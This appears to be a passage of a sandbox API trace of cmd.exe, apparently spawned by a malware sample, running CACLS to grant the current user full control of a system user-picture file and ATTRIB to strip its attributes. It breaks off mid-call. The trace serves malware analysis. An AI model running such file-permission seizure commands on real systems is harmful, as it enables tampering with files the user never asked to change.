lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae9cc | out: phkResult=0x2ae9cc*=0x40) returned 0x0 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x0, lpData=0x2ae9d8*=0xb8, lpcbData=0x2ae9d0*=0x1000) returned 0x2 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x4, lpData=0x2ae9d8*=0x1, lpcbData=0x2ae9d0*=0x4) returned 0x0 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x0, lpData=0x2ae9d8*=0x1, lpcbData=0x2ae9d0*=0x1000) returned 0x2 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x4, lpData=0x2ae9d8*=0x0, lpcbData=0x2ae9d0*=0x4) returned 0x0 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x4, lpData=0x2ae9d8*=0x40, lpcbData=0x2ae9d0*=0x4) returned 0x0 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x4, lpData=0x2ae9d8*=0x40, lpcbData=0x2ae9d0*=0x4) returned 0x0 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x0, lpData=0x2ae9d8*=0x40, lpcbData=0x2ae9d0*=0x1000) returned 0x2 [0186.350] RegCloseKey (hKey=0x40) returned 0x0 [0186.350] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae9cc | out: phkResult=0x2ae9cc*=0x40) returned 0x0 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x0, lpData=0x2ae9d8*=0x40, lpcbData=0x2ae9d0*=0x1000) returned 0x2 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x4, lpData=0x2ae9d8*=0x1, lpcbData=0x2ae9d0*=0x4) returned 0x0 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x0, lpData=0x2ae9d8*=0x1, lpcbData=0x2ae9d0*=0x1000) returned 0x2 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x4, lpData=0x2ae9d8*=0x0, lpcbData=0x2ae9d0*=0x4) returned 0x0 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x4, lpData=0x2ae9d8*=0x9, lpcbData=0x2ae9d0*=0x4) returned 0x0 [0186.351] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x4, lpData=0x2ae9d8*=0x9, lpcbData=0x2ae9d0*=0x4) returned 0x0 [0186.351] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x0, lpData=0x2ae9d8*=0x9, lpcbData=0x2ae9d0*=0x1000) returned 0x2 [0186.351] RegCloseKey (hKey=0x40) returned 0x0 [0186.351] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886394 [0186.351] srand (_Seed=0x5b886394) [0186.351] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\"" [0186.351] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\"" [0186.351] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.351] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x411a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0186.351] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.351] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.351] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0186.351] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0186.351] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0186.351] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0186.352] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0186.352] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0186.352] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0186.352] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0186.352] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0186.352] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0186.352] GetEnvironmentStringsW () returned 0x412458* [0186.352] FreeEnvironmentStringsW (penv=0x412458) returned 1 [0186.352] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.352] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0186.352] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0186.352] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0186.352] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0186.352] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0186.352] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0186.352] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0186.352] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0186.352] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0186.352] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af798 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.352] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af798, lpFilePart=0x2af794 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af794*="Desktop") returned 0x18 [0186.352] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0186.352] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af514 | out: lpFindFileData=0x2af514) returned 0x410ae8 [0186.353] FindClose (in: hFindFile=0x410ae8 | out: hFindFile=0x410ae8) returned 1 [0186.353] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af514 | out: lpFindFileData=0x2af514) returned 0x410ae8 [0186.353] FindClose (in: hFindFile=0x410ae8 | out: hFindFile=0x410ae8) returned 1 [0186.353] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af514 | out: lpFindFileData=0x2af514) returned 0x410ae8 [0186.353] FindClose (in: hFindFile=0x410ae8 | out: hFindFile=0x410ae8) returned 1 [0186.353] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0186.353] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0186.353] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0186.353] GetEnvironmentStringsW () returned 0x410308* [0186.353] FreeEnvironmentStringsW (penv=0x410308) returned 1 [0186.353] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.354] GetConsoleOutputCP () returned 0x1b5 [0186.354] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.354] GetUserDefaultLCID () returned 0x409 [0186.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0186.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af8d8, cchData=128 | out: lpLCData="0") returned 2 [0186.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af8d8, cchData=128 | out: lpLCData="0") returned 2 [0186.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af8d8, cchData=128 | out: lpLCData="1") returned 2 [0186.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0186.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0186.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0186.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0186.355] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0186.355] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0186.355] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0186.355] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0186.355] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0186.355] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0186.355] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0186.355] GetConsoleTitleW (in: lpConsoleTitle=0x4009b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.356] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0186.356] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0186.356] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0186.356] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0186.356] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0186.357] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0186.357] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0186.357] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0186.357] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0186.357] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0186.357] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0186.357] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0186.360] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0186.360] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0186.360] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0186.360] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0186.360] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0186.360] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0186.360] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0186.362] GetConsoleTitleW (in: lpConsoleTitle=0x2af56c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.362] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0186.362] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0186.362] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0186.362] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0186.362] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0186.362] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0186.362] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0186.362] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0186.362] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0186.362] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0186.362] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0186.362] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0186.362] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0186.362] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0186.362] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0186.362] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0186.362] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0186.362] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0186.362] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0186.362] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0186.362] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0186.362] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0186.362] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0186.362] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0186.362] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0186.362] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0186.362] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0186.363] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0186.363] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0186.363] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0186.363] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0186.363] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0186.363] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0186.363] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0186.363] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0186.363] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0186.363] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0186.363] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0186.363] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0186.363] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0186.363] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0186.363] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0186.363] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0186.363] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0186.363] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0186.363] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0186.363] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0186.363] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0186.363] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0186.363] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0186.363] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0186.363] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0186.363] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0186.363] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0186.363] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0186.363] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0186.363] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0186.363] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0186.363] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0186.363] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0186.363] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0186.363] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0186.363] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0186.363] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0186.363] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0186.363] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0186.363] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0186.363] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0186.363] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0186.363] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0186.363] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0186.363] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0186.363] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0186.363] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0186.363] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0186.364] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0186.364] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0186.364] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0186.364] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0186.364] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0186.364] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0186.364] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0186.364] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0186.364] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0186.364] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0186.364] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0186.364] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0186.364] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0186.364] SetErrorMode (uMode=0x0) returned 0x0 [0186.364] SetErrorMode (uMode=0x1) returned 0x0 [0186.364] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x411e98, lpFilePart=0x2af08c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af08c*="Desktop") returned 0x18 [0186.364] SetErrorMode (uMode=0x0) returned 0x1 [0186.364] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.364] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0186.369] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.370] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2aee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee08) returned 0xffffffff [0186.370] GetLastError () returned 0x2 [0186.370] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x2aee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee08) returned 0xffffffff [0186.371] GetLastError () returned 0x2 [0186.371] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2aee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee08) returned 0x412180 [0186.371] FindClose (in: hFindFile=0x412180 | out: hFindFile=0x412180) returned 1 [0186.371] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2aee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee08) returned 0xffffffff [0186.371] GetLastError () returned 0x2 [0186.371] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee08) returned 0x412180 [0186.371] FindClose (in: hFindFile=0x412180 | out: hFindFile=0x412180) returned 1 [0186.371] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0186.371] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0186.371] GetConsoleTitleW (in: lpConsoleTitle=0x2af300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.371] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af188, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af250 | out: lpAttributeList=0x2af188, lpSize=0x2af250) returned 1 [0186.371] UpdateProcThreadAttribute (in: lpAttributeList=0x2af188, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af248, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af188, lpPreviousValue=0x0) returned 1 [0186.371] GetStartupInfoW (in: lpStartupInfo=0x2af144 | out: lpStartupInfo=0x2af144*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0186.372] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0186.373] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af1e4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af230 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x2af230*(hProcess=0x50, hThread=0x4c, dwProcessId=0xdd0, dwThreadId=0x7f8)) returned 1 [0186.375] CloseHandle (hObject=0x4c) returned 1 [0186.375] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0186.375] GetEnvironmentStringsW () returned 0x410308* [0186.375] FreeEnvironmentStringsW (penv=0x410308) returned 1 [0186.375] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0186.413] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af124 | out: lpExitCode=0x2af124*=0x0) returned 1 [0186.413] CloseHandle (hObject=0x50) returned 1 [0186.413] _vsnwprintf (in: _Buffer=0x2af26c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af130 | out: _Buffer="00000000") returned 8 [0186.413] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0186.413] GetEnvironmentStringsW () returned 0x412410* [0186.413] FreeEnvironmentStringsW (penv=0x412410) returned 1 [0186.413] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0186.413] GetEnvironmentStringsW () returned 0x412410* [0186.414] FreeEnvironmentStringsW (penv=0x412410) returned 1 [0186.414] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af188 | out: lpAttributeList=0x2af188) [0186.414] GetConsoleTitleW (in: lpConsoleTitle=0x2af56c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.414] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.414] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0186.414] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.414] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2aee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee08) returned 0xffffffff [0186.414] GetLastError () returned 0x2 [0186.414] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x2aee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee08) returned 0xffffffff [0186.415] GetLastError () returned 0x2 [0186.415] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2aee08, fSearchOp=0x0, 